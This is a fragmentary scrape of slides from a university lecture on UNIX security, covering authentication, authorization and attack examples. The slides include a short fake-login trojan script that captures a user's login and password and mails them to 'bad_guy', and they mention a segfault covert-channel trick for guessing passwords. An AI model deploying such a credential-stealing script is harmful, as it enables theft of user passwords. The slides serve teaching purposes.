Lecture 11. UNIX Security. Important Aspects of Security. Authentication : Make sure someone is who they claim to be Authorization : Make sure people can’t do things they’re not supposed to do Policy : Make sure data is accessible to only those authorized to see it
Related searches for Lecture 11
Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.
Last login ...
print –n “login: ”
print –n “Password:”
print “$login:$password” | mail bad_guy
print “\nLogin incorrect”
This subtle bug appeared on an old system, which contained a system call for authentication: auth(char *user, char *password)
Password checked in clear text:
The trick: Use segfaults as covert channel
p a s s w o r d
(If we have time)
tar xzf <gzipped-tar-file>